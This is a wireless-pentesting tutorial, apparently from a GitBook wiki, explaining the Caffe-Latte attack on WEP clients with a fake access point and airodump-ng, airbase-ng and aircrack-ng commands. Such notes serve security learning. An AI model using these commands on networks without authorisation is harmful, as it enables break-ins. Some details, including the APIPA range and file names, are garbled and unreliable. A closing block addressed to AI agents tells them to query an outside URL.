# Caffe-Latte

This attack is called **Caffe-Latte** because of the time that it gets to break the password.

This attack doesn't attack the access point directly as other attacks, in this attack we will be attacking clients connected to it.

The idea behind the attack is that in **WEP encryption** the user has to authenticate while the Access Point does **NOT.** 

This lack of mutual authentication means that a malicious attacker can impersonate an AP by copying **ESSID (name)** and **BSSID (MAC address; necessary or not depending on the client configuration)** and get to pair with the client to "do things".

### Theory

1. An attacker creates a **Wi-Fi access point (AP)** with an **ESSID** exactly the same **(the BSSID can also be copied if desired)** as the one stored on a victim PC. This network will have **WEP security** but with a different key than the client (since it is NOT known). **Although the attacker and the victim have different encryption keys**, WEP encryption makes it possible to go as far as the client's association with the access point.
2. The client authentication process is done through the proposal of a challenge (fourth arrow; from attacker to client) which is nothing more than a cipher text with the shared key. The client will respond to the challenge (fifth arrow) and the FALSE Access Point will say that it is valid (although it is a lie) by sending an "Authentication Success" (sixth arrow).

<figure><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fimage.slidesharecdn.com%2Ftoorconcaffelatteattack-090918052912-phpapp01%2F95%2Fcaffe-latte-attack-9-728.jpg%3Fcb%3D1253258050&#x26;f=1&#x26;nofb=1&#x26;ipt=652210dbd8db9bc61735f2986af5339c6bee2165c513e0d59ecf84f5f6a637ad&#x26;ipo=images" alt=""><figcaption></figcaption></figure>

* Once the association is established, the client will try to obtain an IP via **DHCP (but the Fake access point will not have DHCP)** and after a timeout the **client's OS will automatically assign a static IP corresponding to the APIPA range** (169.254.0.1 to 169.254.255.255.254 with mask 255.255.0.0). The client will send free ARPs informing of the static IP that has been self-assigned to avoid network problems as shown in the following image.

<figure><img src="https://mundo-hackers.weebly.com/uploads/9/8/5/0/98506118/published/imagen-2013-09-06-a-las-14-48-58-1024x752.jpg?1490891447" alt=""><figcaption></figcaption></figure>

* The next and last step will be performed by the fake AP. From the free ARP the fake AP will introduce in the network ARP requests from any IP with destination IP the client's IP. The client will respond to the ARP packets that are arriving and in a short time we will have enough traffic to be able to crack the WEP password.

<figure><img src="https://mundo-hackers.weebly.com/uploads/9/8/5/0/98506118/published/imagen-2013-09-06-a-las-15-33-36-1024x756.jpg?1490891520" alt=""><figcaption></figcaption></figure>

### Execution

* Start with filtering the wifi network and saving the packet to a file.

```bash
airodump-ng -c 7 -w capturecaffelatte wlan0mon
```

* 2nd step is create  a fake access point with the same mac address as the access point and same name (ESSID).

```bash
airbase-ng -c 7 -a <BSSID> -e 'CaffeLatte' -L -W 1 -x 100 wlan0mon
```

* Doing these two commands we will be capturing the packets (ARP request/response) that will allow us to crack the WEP key.
* Remeber wait a minimum of 5 minutes running this attack.

```bash
 aircrack-ng -e captureCaffeLatte.cap
```

* Once you wait the 5 minutes, use aircrack-ng to crack the WEP key.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hackzzz.gitbook.io/welcome/everything-about-and-notes/wireless-pentesting/wep/caffe-latte.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.